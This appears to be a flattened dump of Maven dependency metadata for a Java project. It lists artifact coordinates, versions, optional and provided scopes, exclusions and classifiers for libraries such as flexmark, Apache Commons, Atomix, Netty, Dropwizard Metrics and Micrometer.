com.vladsch.flexmark:flexmark-ext-definition@0.62.2 com.vladsch.flexmark:flexmark-ext-emoji@0.62.2 com.vladsch.flexmark:flexmark-ext-escaped-character@0.62.2 com.vladsch.flexmark:flexmark-ext-footnotes@0.62.2 com.vladsch.flexmark:flexmark-ext-gfm-strikethrough@0.62.2 com.vladsch.flexmark:flexmark-ext-gfm-tasklist@0.62.2 com.vladsch.flexmark:flexmark-ext-ins@0.62.2 com.vladsch.flexmark:flexmark-ext-jekyll-front-matter@0.62.2 com.vladsch.flexmark:flexmark-ext-superscript@0.62.2 com.vladsch.flexmark:flexmark-ext-tables@0.62.2 com.vladsch.flexmark:flexmark-ext-toc@0.62.2 com.vladsch.flexmark:flexmark-ext-typographic@0.62.2 com.vladsch.flexmark:flexmark-ext-wikilink@0.62.2 com.vladsch.flexmark:flexmark-util-ast@0.62.2 com.vladsch.flexmark:flexmark-util-data@0.62.2 com.vladsch.flexmark:flexmark-util-misc@0.62.2 com.vladsch.flexmark:flexmark-util-sequence@0.62.2 com.vladsch.flexmark:flexmark-util 0.62.2 com.vladsch.flexmark:flexmark-util-ast@0.62.2 com.vladsch.flexmark:flexmark-util-builder@0.62.2 com.vladsch.flexmark:flexmark-util-collection@0.62.2 com.vladsch.flexmark:flexmark-util-data@0.62.2 com.vladsch.flexmark:flexmark-util-dependency@0.62.2 com.vladsch.flexmark:flexmark-util-format@0.62.2 com.vladsch.flexmark:flexmark-util-html@0.62.2 com.vladsch.flexmark:flexmark-util-misc@0.62.2 com.vladsch.flexmark:flexmark-util-options@0.62.2 com.vladsch.flexmark:flexmark-util-sequence@0.62.2 com.vladsch.flexmark:flexmark-util-visitor@0.62.2 org.jetbrains:annotations@15.0 com.vladsch.flexmark:flexmark-util-ast 0.62.2 com.vladsch.flexmark:flexmark-util-collection@0.62.2 com.vladsch.flexmark:flexmark-util-misc@0.62.2 com.vladsch.flexmark:flexmark-util-data@0.62.2 com.vladsch.flexmark:flexmark-util-sequence@0.62.2 com.vladsch.flexmark:flexmark-util-visitor@0.62.2 org.jetbrains:annotations@15.0 com.vladsch.flexmark:flexmark-util-builder 0.62.2 com.vladsch.flexmark:flexmark-util-misc@0.62.2 com.vladsch.flexmark:flexmark-util-data@0.62.2 org.jetbrains:annotations@15.0 com.vladsch.flexmark:flexmark-util-collection 0.62.2 com.vladsch.flexmark:flexmark-util-misc@0.62.2 org.jetbrains:annotations@15.0 com.vladsch.flexmark:flexmark-util-data 0.62.2 com.vladsch.flexmark:flexmark-util-misc@0.62.2 org.jetbrains:annotations@15.0 com.vladsch.flexmark:flexmark-util-dependency 0.62.2 com.vladsch.flexmark:flexmark-util-collection@0.62.2 com.vladsch.flexmark:flexmark-util-misc@0.62.2 com.vladsch.flexmark:flexmark-util-data@0.62.2 org.jetbrains:annotations@15.0 com.vladsch.flexmark:flexmark-util-format 0.62.2 com.vladsch.flexmark:flexmark-util-ast@0.62.2 com.vladsch.flexmark:flexmark-util-collection@0.62.2 com.vladsch.flexmark:flexmark-util-data@0.62.2 com.vladsch.flexmark:flexmark-util-html@0.62.2 com.vladsch.flexmark:flexmark-util-misc@0.62.2 com.vladsch.flexmark:flexmark-util-sequence@0.62.2 org.jetbrains:annotations@15.0 com.vladsch.flexmark:flexmark-util-html 0.62.2 com.vladsch.flexmark:flexmark-util-misc@0.62.2 com.vladsch.flexmark:flexmark-util-sequence@0.62.2 org.jetbrains:annotations@15.0 com.vladsch.flexmark:flexmark-util-misc 0.62.2 org.jetbrains:annotations@15.0 com.vladsch.flexmark:flexmark-util-options 0.62.2 com.vladsch.flexmark:flexmark-util-misc@0.62.2 com.vladsch.flexmark:flexmark-util-sequence@0.62.2 org.jetbrains:annotations@15.0 com.vladsch.flexmark:flexmark-util-sequence 0.62.2 com.vladsch.flexmark:flexmark-util-collection@0.62.2 com.vladsch.flexmark:flexmark-util-data@0.62.2 com.vladsch.flexmark:flexmark-util-misc@0.62.2 org.jetbrains:annotations@15.0 com.vladsch.flexmark:flexmark-util-visitor 0.62.2 org.jetbrains:annotations@15.0 com.vladsch.flexmark:flexmark-youtrack-converter 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-gfm-strikethrough@0.62.2 com.vladsch.flexmark:flexmark-ext-tables@0.62.2 com.zaxxer:HikariCP-java7 2.4.13 org.slf4j:slf4j-api@1.7.21 Opt|org.javassist:javassist@3.20.0-GA Opt Scope provided MavenExclusions org.jboss.logging:jboss-logging,org.jboss.logging:jboss-logging-annotations|org.hibernate:hibernate-core@5.0.9.Final Opt Scope provided|io.dropwizard.metrics:metrics-core@3.1.2 Opt Scope provided|io.dropwizard.metrics:metrics-healthchecks@3.1.2 Opt Scope provided|io.prometheus:simpleclient@0.0.16 commons-beanutils:commons-beanutils 1.9.4 commons-logging:commons-logging@1.2 commons-collections:commons-collections@3.2.2 1.11.0 commons-logging:commons-logging@1.3.5 commons-collections:commons-collections@3.2.2 commons-beanutils:commons-beanutils-core 1.8.0 commons-logging:commons-logging@1.1.1 commons-cli:commons-cli 1.4 commons-codec:commons-codec 1.10 1.11 1.14 commons-collections:commons-collections 3.2.1 3.2.2 commons-configuration:commons-configuration 1.6 commons-collections:commons-collections@3.2.1 commons-lang:commons-lang@2.4 commons-logging:commons-logging@1.1.1 commons-digester:commons-digester@1.8 commons-beanutils:commons-beanutils-core@1.8.0 Opt|commons-codec:commons-codec@1.3 Opt|commons-jxpath:commons-jxpath@1.3 Scope provided|xerces:xercesImpl@2.3.0 Scope provided|xalan:xalan@2.7.0 Scope provided|xml-apis:xml-apis@1.0.b2 Opt|javax.servlet:servlet-api@2.4 Opt|javax.mail:mail@1.4 Opt|ant:ant@1.6.5 commons-digester:commons-digester 1.8 commons-beanutils:commons-beanutils@1.7.0 commons-logging:commons-logging@1.1 Scope provided|xml-apis:xml-apis@1.0.b2 commons-httpclient:commons-httpclient 3.1 commons-logging:commons-logging@1.0.4 commons-codec:commons-codec@1.2 commons-io:commons-io 2.4 2.7 2.14.0 commons-lang:commons-lang 2.6 commons-logging:commons-logging 1.1.3 Opt|log4j:log4j@1.2.17 Opt|logkit:logkit@1.0.1 Opt|avalon-framework:avalon-framework@4.1.5 Opt Scope provided|javax.servlet:servlet-api@2.3 1.2 Opt|log4j:log4j@1.2.17 Opt|logkit:logkit@1.0.1 Opt|avalon-framework:avalon-framework@4.1.5 Opt Scope provided|javax.servlet:servlet-api@2.3 commons-net:commons-net 3.1 3.6 3.9.0 de.rototor.pdfbox:graphics2d 0.24 org.apache.pdfbox:pdfbox@2.0.16 findbugs:annotations 1.0.0 io.atomix:atomix 3.0.0-rc5 io.atomix:atomix-cluster@3.0.0-rc5 io.atomix:atomix-primitive@3.0.0-rc5 Opt|io.atomix:atomix-gossip@3.0.0-rc5 Opt|io.atomix:atomix-raft@3.0.0-rc5 Opt|io.atomix:atomix-primary-backup@3.0.0-rc5 io.atomix:atomix-utils@3.0.0-rc5 Opt|javax.ws.rs:javax.ws.rs-api@2.0 org.slf4j:slf4j-api@1.7.7 3.1.6 io.atomix:atomix-cluster@3.1.6 io.atomix:atomix-primitive@3.1.6 Opt|io.atomix:atomix-gossip@3.1.6 Opt|io.atomix:atomix-raft@3.1.6 Opt|io.atomix:atomix-primary-backup@3.1.6 Opt|io.atomix:atomix-log@3.1.6 io.atomix:atomix-utils@3.1.6 org.slf4j:slf4j-api@1.7.7 io.atomix:atomix-cluster 3.0.0-rc5 io.atomix:atomix-utils@3.0.0-rc5 io.netty:netty-transport@4.1.27.Final io.netty:netty-codec@4.1.27.Final io.netty:netty-handler@4.1.27.Final MavenClassifier linux-x86_64|io.netty:netty-transport-native-epoll@4.1.27.Final org.slf4j:slf4j-api@1.7.7 3.1.6 io.atomix:atomix-utils@3.1.6 io.netty:netty-transport@4.1.27.Final io.netty:netty-codec@4.1.27.Final io.netty:netty-handler@4.1.27.Final MavenClassifier linux-x86_64|io.netty:netty-transport-native-epoll@4.1.27.Final org.slf4j:slf4j-api@1.7.7 io.atomix:atomix-parent 3.0.0-rc5 org.slf4j:slf4j-api@1.7.7 3.1.6 org.slf4j:slf4j-api@1.7.7 io.atomix:atomix-primary-backup 3.0.0-rc5 io.atomix:atomix-primitive@3.0.0-rc5 io.atomix:atomix-utils@3.0.0-rc5 org.slf4j:slf4j-api@1.7.7 io.atomix:atomix-primitive 3.0.0-rc5 io.atomix:atomix-cluster@3.0.0-rc5 io.atomix:atomix-storage@3.0.0-rc5 io.atomix:atomix-utils@3.0.0-rc5 org.slf4j:slf4j-api@1.7.7 3.1.6 io.atomix:atomix-cluster@3.1.6 io.atomix:atomix-storage@3.1.6 io.atomix:atomix-utils@3.1.6 org.slf4j:slf4j-api@1.7.7 io.atomix:atomix-protocols-parent 3.0.0-rc5 org.slf4j:slf4j-api@1.7.7 io.atomix:atomix-raft 3.0.0-rc5 io.atomix:atomix-primitive@3.0.0-rc5 org.slf4j:slf4j-api@1.7.7 io.atomix:atomix-storage 3.0.0-rc5 io.atomix:atomix-utils@3.0.0-rc5 org.slf4j:slf4j-api@1.7.7 3.1.6 io.atomix:atomix-utils@3.1.6 org.slf4j:slf4j-api@1.7.7 io.atomix:atomix-utils 3.0.0-rc5 com.google.guava:guava@22.0 org.apache.commons:commons-lang3@3.7 org.apache.commons:commons-math3@3.6.1 com.esotericsoftware:kryo@4.0.2 com.typesafe:config@1.3.2 io.github.lukehutch:fast-classpath-scanner@2.21 org.slf4j:slf4j-api@1.7.7 3.1.6 com.google.guava:guava@22.0 org.apache.commons:commons-lang3@3.7 org.apache.commons:commons-math3@3.6.1 com.esotericsoftware:kryo@4.0.2 com.typesafe:config@1.3.2 io.github.classgraph:classgraph@4.2.3 org.slf4j:slf4j-api@1.7.7 io.dropwizard.metrics:metrics-bom 4.0.7 org.slf4j:slf4j-api@1.7.26 4.1.14 org.slf4j:slf4j-api@1.7.30 io.dropwizard.metrics:metrics-core 4.0.7 org.slf4j:slf4j-api@1.7.26 4.1.14 org.slf4j:slf4j-api@1.7.30 io.dropwizard.metrics:metrics-healthchecks 4.1.14 Opt|io.dropwizard.metrics:metrics-jvm@4.1.14 org.slf4j:slf4j-api@1.7.30 io.dropwizard.metrics:metrics-jmx 4.0.7 io.dropwizard.metrics:metrics-core@4.0.7 org.slf4j:slf4j-api@1.7.26 4.1.14 io.dropwizard.metrics:metrics-core@4.1.14 org.slf4j:slf4j-api@1.7.30 io.dropwizard.metrics:metrics-json 4.1.14 io.dropwizard.metrics:metrics-core@4.1.14 Opt|io.dropwizard.metrics:metrics-healthchecks@4.1.14 com.fasterxml.jackson.core:jackson-databind@2.9.10.5 org.slf4j:slf4j-api@1.7.30 io.dropwizard.metrics:metrics-jvm 4.1.14 io.dropwizard.metrics:metrics-core@4.1.14 org.slf4j:slf4j-api@1.7.30 io.dropwizard.metrics:metrics-parent 4.0.7 org.slf4j:slf4j-api@1.7.26 4.1.14 org.slf4j:slf4j-api@1.7.30 io.dropwizard.metrics:metrics-servlets 4.1.14 io.dropwizard.metrics:metrics-core@4.1.14 io.dropwizard.metrics:metrics-healthchecks@4.1.14 io.dropwizard.metrics:metrics-json@4.1.14 io.dropwizard.metrics:metrics-jvm@4.1.14 com.helger:profiler@1.1.1 Scope provided|javax.servlet:javax.servlet-api@3.1.0 com.fasterxml.jackson.core:jackson-databind@2.9.10.5 org.slf4j:slf4j-api@1.7.30 io.github.classgraph:classgraph 4.2.3 4.8.112 Scope provided|org.eclipse.jdt:org.eclipse.jdt.annotation@2.2.600 io.github.lukehutch:fast-classpath-scanner 2.21 io.micrometer:micrometer-core 1.6.0 org.hdrhistogram:HdrHistogram@2.1.12 Scope runtime MavenExclusions org.hdrhistogram:HdrHistogram|org.latencyutils:LatencyUtils@2.0.3 Opt|com.google.code.findbugs:jsr305@3.0.2 Opt|io.dropwizard.metrics:metrics-core@4.0.7 Opt|com.google.guava:guava@30.0-jre Opt|com.github.ben-manes.caffeine:caffeine@2.8.6 Opt|net.sf.ehcache:ehcache@2.10.6 Opt|javax.cache:cache-api@1.1.1 Opt|com.hazelcast:hazelcast@4.1-BETA-1 Opt|org.hibernate:hibernate-entitymanager@5.4.22.Final Opt|org.eclipse.jetty:jetty-server@9.4.33.v20201020 Opt|org.eclipse.jetty:jetty-client@9.4.33.v20201020 Opt|org.apache.tomcat.embed:tomcat-embed-core@8.5.59 Opt|org.apache.httpcomponents:httpclient@4.5.13 Opt|org.apache.httpcomponents:httpasyncclient@4.1.4 Opt|com.netflix.hystrix:hystrix-core@1.5.12 Opt|ch.qos.logback:logback-classic@1.2.3 Opt|org.apache.logging.log4j:log4j-core@2.13.3 Opt|io.projectreactor:reactor-core@3.3.11.RELEASE Opt|io.projectreactor.netty:reactor-netty@0.9.13.RELEASE Opt|org.aspectj:aspectjweaver@1.8.14 Opt|com.squareup.okhttp3:okhttp@4.10.0-RC1 Opt|org.mongodb:mongo-java-driver@3.12.7 Opt|org.jooq:jooq@3.13.6 Opt|org.apache.kafka:kafka-clients@2.6.0 Opt|org.apache.kafka:kafka-streams@2.6.0 io.micrometer:micrometer-registry-jmx 1.6.0 io.micrometer:micrometer-core@1.6.0 io.dropwizard.metrics:metrics-jmx@4.0.7 Opt|com.google.code.findbugs:jsr305@3.0.2 io.micrometer:micrometer-registry-prometheus 1.6.0 io.micrometer:micrometer-core@1.6.0 io.prometheus:simpleclient_common@0.9.0 Opt|com.google.code.findbugs:jsr305@3.0.2 io.netty:netty 3.5.2.Final Opt|org.jboss.marshalling:jboss-marshalling@1.3.14.GA Opt|com.google.protobuf:protobuf-java@2.4.1 Opt|javax.servlet:servlet-api@2.5 Opt|javax.activation:activation@1.1.1 Opt|org.apache.felix:org.osgi.core@1.4.0 Opt MavenExclusions org.apache.felix:javax.servlet,org.apache.felix:org.osgi.foundation|org.apache.felix:org.osgi.compendium@1.4.0 Opt|org.slf4j:slf4j-api@1.6.4 Opt|commons-logging:commons-logging@1.1.1 Opt|org.jboss.logging:jboss-logging-spi@2.1.2.GA Opt MavenExclusions javax.mail:mail,javax.jms:jms,com.sun.jdmk:jmxtools,com.sun.jmx:jmxri|log4j:log4j@1.2.16 3.7.0.Final Opt|org.jboss.marshalling:jboss-marshalling@1.3.14.GA Opt|com.google.protobuf:protobuf-java@2.5.0 Opt|javax.servlet:servlet-api@2.5 Opt|javax.activation:activation@1.1.1 Opt|org.apache.felix:org.osgi.core@1.4.0 Opt MavenExclusions org.apache.felix:javax.servlet,org.apache.felix:org.osgi.foundation|org.apache.felix:org.osgi.compendium@1.4.0 Opt|org.slf4j:slf4j-api@1.6.4 Opt|commons-logging:commons-logging@1.1.1 Opt|org.jboss.logging:jboss-logging-spi@2.1.2.GA Opt MavenExclusions javax.mail:mail,javax.jms:jms,com.sun.jdmk:jmxtools,com.sun.jmx:jmxri|log4j:log4j@1.2.16 3.9.8.Final Opt MavenClassifier windows-x86_64|io.netty:netty-tcnative@1.1.30.Fork2 Opt|org.jboss.marshalling:jboss-marshalling@1.3.14.GA Opt|com.google.protobuf:protobuf-java@2.5.0 Opt|org.bouncycastle:bcpkix-jdk15on@1.50 Opt|org.eclipse.jetty.npn:npn-api@1.1.0.v20120525 Opt|javax.servlet:servlet-api@2.5 Opt|javax.activation:activation@1.1.1 Opt|org.apache.felix:org.osgi.core@1.4.0 Opt MavenExclusions org.apache.felix:javax.servlet,org.apache.felix:org.osgi.foundation|org.apache.felix:org.osgi.compendium@1.4.0 Opt|org.slf4j:slf4j-api@1.6.4 Opt|commons-logging:commons-logging@1.1.1 Opt|org.jboss.logging:jboss-logging@3.1.4.GA Opt MavenExclusions javax.mail:mail,javax.jms:jms,com.sun.jdmk:jmxtools,com.sun.jmx:jmxri|log4j:log4j@1.2.16 io.netty:netty-bom 4.1.27.Final 4.1.109.Final io.netty:netty-buffer 4.1.27.Final io.netty:netty-common@4.1.27.Final io.netty:netty-codec 4.1.27.Final io.netty:netty-transport@4.1.27.Final Opt|com.google.protobuf:protobuf-java@2.6.1 Opt|com.google.protobuf.nano:protobuf-javanano@3.0.0-alpha-5 Opt|org.jboss.marshalling:jboss-marshalling@1.4.11.Final Opt|com.jcraft:jzlib@1.1.3 Opt|com.ning:compress-lzf@1.0.3 Opt|net.jpountz.lz4:lz4@1.3.0 Opt|com.github.jponge:lzma-java@1.3 4.1.68.Final io.netty:netty-common@4.1.68.Final io.netty:netty-buffer@4.1.68.Final io.netty:netty-transport@4.1.68.Final Opt|com.google.protobuf:protobuf-java@2.6.1 Opt|com.google.protobuf.nano:protobuf-javanano@3.0.0-alpha-5 Opt|org.jboss.marshalling:jboss-marshalling@1.4.11.Final Opt|com.jcraft:jzlib@1.1.3 Opt|com.ning:compress-lzf@1.0.3 Opt|net.jpountz.lz4:lz4@1.3.0 Opt|com.github.jponge:lzma-java@1.3 Opt|com.github.luben:zstd-jni@1.5.0-2 Opt|com.aayushatharva.brotli4j:brotli4j@1.5.0 Opt|com.aayushatharva.brotli4j:native-linux-x86_64@1.5.0 Opt|com.aayushatharva.brotli4j:native-osx-x86_64@1.5.0 Opt|com.aayushatharva.brotli4j:native-windows-x86_64@1.5.0 4.1.125.Final io.netty:netty-common@4.1.125.Final io.netty:netty-buffer@4.1.125.Final io.netty:netty-transport@4.1.125.Final Opt|com.google.protobuf:protobuf-java@2.6.1 Opt|com.google.protobuf.nano:protobuf-javanano@3.0.0-alpha-5 Opt|org.jboss.marshalling:jboss-marshalling@1.4.11.Final Opt|com.jcraft:jzlib@1.1.3 Opt|com.ning:compress-lzf@1.0.3 Opt|org.lz4:lz4-java@1.8.0 Opt|com.github.jponge:lzma-java@1.3 Opt|com.github.luben:zstd-jni@1.5.5-11 Opt|com.aayushatharva.brotli4j:brotli4j@1.16.0 Opt|com.aayushatharva.brotli4j:native-linux-x86_64@1.16.0 Opt|com.aayushatharva.brotli4j:native-linux-aarch64@1.16.0 Opt|com.aayushatharva.brotli4j:native-linux-riscv64@1.16.0 Opt|com.aayushatharva.brotli4j:native-osx-x86_64@1.16.0 Opt|com.aayushatharva.brotli4j:native-osx-aarch64@1.16.0 Opt|com.aayushatharva.brotli4j:native-windows-x86_64@1.16.0 io.netty:netty-common 4.1.27.Final Opt|org.slf4j:slf4j-api@1.7.21 Opt|commons-logging:commons-logging@1.2 Opt MavenExclusions javax.mail:mail,javax.jms:jms,com.sun.jdmk:jmxtools,com.sun.jmx:jmxri|log4j:log4j@1.2.17 Opt|org.apache.logging.log4j:log4j-api@2.6.2 4.1.45.Final Scope provided MavenExclusions com.oracle.substratevm:svm-hosted-native-linux-amd64,com.oracle.substratevm:svm-hosted-native-darwin-amd64,com.oracle.substratevm:svm-hosted-native-windows-amd64,org.graalvm.sdk:graal-sdk,com.oracle.substratevm:objectfile,com.oracle.substratevm:pointsto,org.graalvm.truffle:truffle-nfi,org.graalvm.compiler:compiler|com.oracle.substratevm:svm@19.0.0 Opt|org.slf4j:slf4j-api@1.7.21 Opt|commons-logging:commons-logging@1.2 Opt MavenExclusions javax.mail:mail,javax.jms:jms,com.sun.jdmk:jmxtools,com.sun.jmx:jmxri|log4j:log4j@1.2.17 Opt|org.apache.logging.log4j:log4j-api@2.6.2 Opt|io.projectreactor.tools:blockhound@1.0.1.RELEASE 4.1.46.Final Scope provided MavenExclusions com.oracle.substratevm:svm-hosted-native-linux-amd64,com.oracle.substratevm:svm-hosted-native-darwin-amd64,com.oracle.substratevm:svm-hosted-native-windows-amd64,org.graalvm.sdk:graal-sdk,com.oracle.substratevm:objectfile,com.oracle.substratevm:pointsto,org.graalvm.truffle:truffle-nfi,org.graalvm.compiler:compiler|com.oracle.substratevm:svm@19.0.0 Opt|org.slf4j:slf4j-api@1.7.21 Opt|commons-logging:commons-logging@1.2 Opt MavenExclusions javax.mail:mail,javax.jms:jms,com.sun.jdmk:jmxtools,com.sun.jmx:jmxri|log4j:log4j@1.2.17 Opt|org.apache.logging.log4j:log4j-api@2.6.2 Opt|io.projectreactor.tools:blockhound@1.0.2.RELEASE 4.1.68.Final Scope provided MavenExclusions org.graalvm.nativeimage:svm-hosted-native-linux-amd64,org.graalvm.nativeimage:svm-hosted-native-darwin-amd64,org.graalvm.nativeimage:svm-hosted-native-windows-amd64,org.graalvm.sdk:graal-sdk,org.graalvm.nativeimage:objectfile,org.graalvm.nativeimage:pointsto,org.graalvm.truffle:truffle-nfi,org.graalvm.compiler:compiler|org.graalvm.nativeimage:svm@19.3.6 Opt|org.slf4j:slf4j-api@1.7.30 Opt|commons-logging:commons-logging@1.2 Opt MavenExclusions javax.mail:mail,javax.jms:jms,com.sun.jdmk:jmxtools,com.sun.jmx:jmxri|org.apache.logging.log4j:log4j-1.2-api@2.14.1 Opt|org.apache.logging.log4j:log4j-api@2.6.2 Opt|io.projectreactor.tools:blockhound@1.0.6.RELEASE 4.1.94.Final Scope provided MavenExclusions org.graalvm.nativeimage:svm-hosted-native-linux-amd64,org.graalvm.nativeimage:svm-hosted-native-darwin-amd64,org.graalvm.nativeimage:svm-hosted-native-windows-amd64,org.graalvm.sdk:graal-sdk,org.graalvm.nativeimage:objectfile,org.graalvm.nativeimage:pointsto,org.graalvm.truffle:truffle-nfi,org.graalvm.compiler:compiler|org.graalvm.nativeimage:svm@19.3.6 Scope provided|org.jetbrains:annotations-java5@23.0.0 Opt|org.slf4j:slf4j-api@1.7.30 Opt|commons-logging:commons-logging@1.2 Opt MavenExclusions javax.mail:mail,javax.jms:jms,com.sun.jdmk:jmxtools,com.sun.jmx:jmxri|org.apache.logging.log4j:log4j-1.2-api@2.17.2 Opt|org.apache.logging.log4j:log4j-api@2.17.2 Opt|io.projectreactor.tools:blockhound@1.0.6.RELEASE 4.1.115.Final Scope provided MavenExclusions org.graalvm.nativeimage:svm-hosted-native-linux-amd64,org.graalvm.nativeimage:svm-hosted-native-darwin-amd64,org.graalvm.nativeimage:svm-hosted-native-windows-amd64,org.graalvm.sdk:graal-sdk,org.graalvm.nativeimage:objectfile,org.graalvm.nativeimage:pointsto,org.graalvm.truffle:truffle-nfi,org.graalvm.compiler:compiler|org.graalvm.nativeimage:svm@19.3.6 Scope provided|org.jetbrains:annotations-java5@23.0.0 Opt|org.slf4j:slf4j-api@1.7.30 Opt|commons-logging:commons-logging@1.2 Opt MavenExclusions javax.mail:mail,javax.jms:jms,com.sun.jdmk:jmxtools,com.sun.jmx:jmxri|org.apache.logging.log4j:log4j-1.2-api@2.17.2 Opt|org.apache.logging.log4j:log4j-api@2.17.2 Opt|io.projectreactor.tools:blockhound@1.0.6.RELEASE 4.1.118.Final Scope provided MavenExclusions org.graalvm.nativeimage:svm-hosted-native-linux-amd64,org.graalvm.nativeimage:svm-hosted-native-darwin-amd64,org.graalvm.nativeimage:svm-hosted-native-windows-amd64,org.graalvm.sdk:graal-sdk,org.graalvm.nativeimage:objectfile,org.graalvm.nativeimage:pointsto,org.graalvm.truffle:truffle-nfi,org.graalvm.compiler:compiler|org.graalvm.nativeimage:svm@19.3.6 Scope provided|org.jetbrains:annotations-java5@23.0.0 Opt|org.slf4j:slf4j-api@1.7.30 Opt|commons-logging:commons-logging@1.2 Opt MavenExclusions javax.mail:mail,javax.jms:jms,com.sun.jdmk:jmxtools,com.sun.jmx:jmxri|org.apache.logging.log4j:log4j-1.2-api@2.17.2 Opt|org.apache.logging.log4j:log4j-api@2.17.2 Opt|io.projectreactor.tools:blockhound@1.0.10.RELEASE 4.1.125.Final Opt|org.graalvm.nativeimage:svm@19.3.6 Scope provided|org.jboss:jdk-misc@3.Final Scope provided|org.jetbrains:annotations-java5@23.0.0 Opt|org.slf4j:slf4j-api@1.7.30 Opt|commons-logging:commons-logging@1.2 Opt MavenExclusions javax.mail:mail,javax.jms:jms,com.sun.jdmk:jmxtools,com.sun.jmx:jmxri|org.apache.logging.log4j:log4j-1.2-api@2.17.2 Opt|org.apache.logging.log4j:log4j-api@2.17.2 Opt|io.projectreactor.tools:blockhound@1.0.13.RELEASE io.netty:netty-handler 4.1.27.Final io.netty:netty-buffer@4.1.27.Final io.netty:netty-transport@4.1.27.Final io.netty:netty-codec@4.1.27.Final Opt|org.bouncycastle:bcpkix-jdk15on@1.54 Opt Scope provided|org.eclipse.jetty.npn:npn-api@1.1.1.v20141010 Opt Scope provided|org.eclipse.jetty.alpn:alpn-api@1.1.2.v20150522 Opt|org.conscrypt:conscrypt-openjdk-uber@1.1.3 4.1.45.Final io.netty:netty-common@4.1.45.Final io.netty:netty-buffer@4.1.45.Final io.netty:netty-transport@4.1.45.Final io.netty:netty-codec@4.1.45.Final Opt|org.bouncycastle:bcpkix-jdk15on@1.54 Opt Scope provided|org.eclipse.jetty.npn:npn-api@1.1.1.v20141010 Opt Scope provided|org.eclipse.jetty.alpn:alpn-api@1.1.2.v20150522 Opt|org.conscrypt:conscrypt-openjdk-uber@1.3.0 4.1.46.Final io.netty:netty-common@4.1.46.Final io.netty:netty-resolver@4.1.46.Final io.netty:netty-buffer@4.1.46.Final io.netty:netty-transport@4.1.46.Final io.netty:netty-codec@4.1.46.Final Opt|org.bouncycastle:bcpkix-jdk15on@1.54 Opt Scope provided|org.eclipse.jetty.npn:npn-api@1.1.1.v20141010 Opt Scope provided|org.eclipse.jetty.alpn:alpn-api@1.1.2.v20150522 Opt|org.conscrypt:conscrypt-openjdk-uber@1.3.0 4.1.94.Final io.netty:netty-common@4.1.94.Final io.netty:netty-resolver@4.1.94.Final io.netty:netty-buffer@4.1.94.Final io.netty:netty-transport@4.1.94.Final io.netty:netty-transport-native-unix-common@4.1.94.Final io.netty:netty-codec@4.1.94.Final Opt|io.netty:netty-tcnative-classes@2.0.61.Final Opt|org.bouncycastle:bcpkix-jdk15on@1.69 Opt|org.bouncycastle:bctls-jdk15on@1.69 Opt Scope provided|org.eclipse.jetty.npn:npn-api@1.1.1.v20141010 Opt Scope provided|org.eclipse.jetty.alpn:alpn-api@1.1.2.v20150522 Opt|org.conscrypt:conscrypt-openjdk-uber@2.5.2 4.1.118.Final io.netty:netty-common@4.1.118.Final io.netty:netty-resolver@4.1.118.Final io.netty:netty-buffer@4.1.118.Final io.netty:netty-transport@4.1.118.Final io.netty:netty-transport-native-unix-common@4.1.118.Final io.netty:netty-codec@4.1.118.Final Opt|io.netty:netty-tcnative-classes@2.0.70.Final Opt|org.bouncycastle:bcpkix-jdk15on@1.69 Opt|org.bouncycastle:bctls-jdk15on@1.69 Opt Scope provided|org.eclipse.jetty.npn:npn-api@1.1.1.v20141010 Opt Scope provided|org.eclipse.jetty.alpn:alpn-api@1.1.2.v20150522 Opt|org.conscrypt:conscrypt-openjdk-uber@2.5.2 io.netty:netty-parent 4.1.27.Final 4.1.45.Final 4.1.46.Final 4.1.68.Final 4.1.94.Final 4.1.115.Final 4.1.118.Final 4.1.125.Final io.netty:netty-resolver 4.1.27.Final io.netty:netty-common@4.1.27.Final io.netty:netty-transport 4.1.27.Final io.netty:netty-buffer@4.1.27.Final io.netty:netty-resolver@4.1.27.Final io.netty:netty-transport-native-epoll 4.1.27.Final io.netty:netty-common@4.1.27.Final io.netty:netty-buffer@4.1.27.Final io.netty:netty-transport-native-unix-common@4.1.27.Final io.netty:netty-transport@4.1.27.Final io.netty:netty-transport-native-unix-common 4.1.27.Final io.netty:netty-common@4.1.27.Final io.netty:netty-transport@4.1.27.Final 4.1.94.Final Opt MavenClassifier sources|io.netty:netty-jni-util@0.0.6.Final io.netty:netty-common@4.1.94.Final io.netty:netty-buffer@4.1.94.Final io.netty:netty-transport@4.1.94.Final 4.1.118.Final Opt MavenClassifier sources|io.netty:netty-jni-util@0.0.9.Final io.netty:netty-common@4.1.118.Final io.netty:netty-buffer@4.1.118.Final io.netty:netty-transport@4.1.118.Final io.prometheus:parent 0.9.0 io.prometheus:simpleclient 0.9.0 io.prometheus:simpleclient_common 0.9.0 io.prometheus:simpleclient@0.9.0 jakarta.activation:jakarta.activation-api 1.2.1 jakarta.annotation:ca-parent 1.3.5 jakarta.annotation:jakarta.annotation-api 1.3.5 jakarta.persistence:jakarta.persistence-api 2.2.3 jakarta.servlet:jakarta.servlet-api 4.0.3 jakarta.validation:jakarta.validation-api 2.0.2 jakarta.ws.rs:jakarta.ws.rs-api 2.1.6 jakarta.xml.bind:jakarta.xml.bind-api 2.3.2 jakarta.activation:jakarta.activation-api@1.2.1 jakarta.xml.bind:jakarta.xml.bind-api-parent 2.3.2 javax.activation:activation 1.1 javax.annotation:javax.annotation-api 1.3.2 javax.annotation:jsr250-api 1.0 javax.enterprise:cdi-api 1.0 Opt|javax.el:el-api@2.1.2-b04 Opt MavenExclusions jbossws:jboss-jaxrpc,org.jboss.javaee:jboss-transaction-api,jboss.jbossws:jboss-jaxrpc|org.jboss.ejb3:jboss-ejb3-api@3.1.0 org.jboss.interceptor:jboss-interceptor-api@1.1 javax.annotation:jsr250-api@1.0 javax.inject:javax.inject@1 javax.inject:javax.inject 1 javax.servlet.jsp:jsp-api 2.1 2.2 Scope provided|org.glassfish:javax.servlet@3.0-b72 Scope provided|javax.el:el-api@2.2 javax.servlet:javax.servlet-api 3.1.0 javax.servlet:servlet-api 2.5 javax.websocket:javax.websocket-all 1.0 javax.websocket:javax.websocket-api 1.0 Opt|javax.websocket:javax.websocket-client-api@1.0 javax.websocket:javax.websocket-client-api 1.0 javax.ws.rs:javax.ws.rs-api 2.1 javax.xml.bind:jaxb-api 2.2.2 javax.xml.stream:stax-api@1.0-2 javax.activation:activation@1.1 javax.xml.stream:stax-api 1.0-2 jline:jline 2.14.3 net.bytebuddy:byte-buddy 1.11.13 Scope provided|net.java.dev.jna:jna@5.8.0 Scope provided|net.java.dev.jna:jna-platform@5.8.0 Scope provided|com.google.code.findbugs:findbugs-annotations@3.0.1 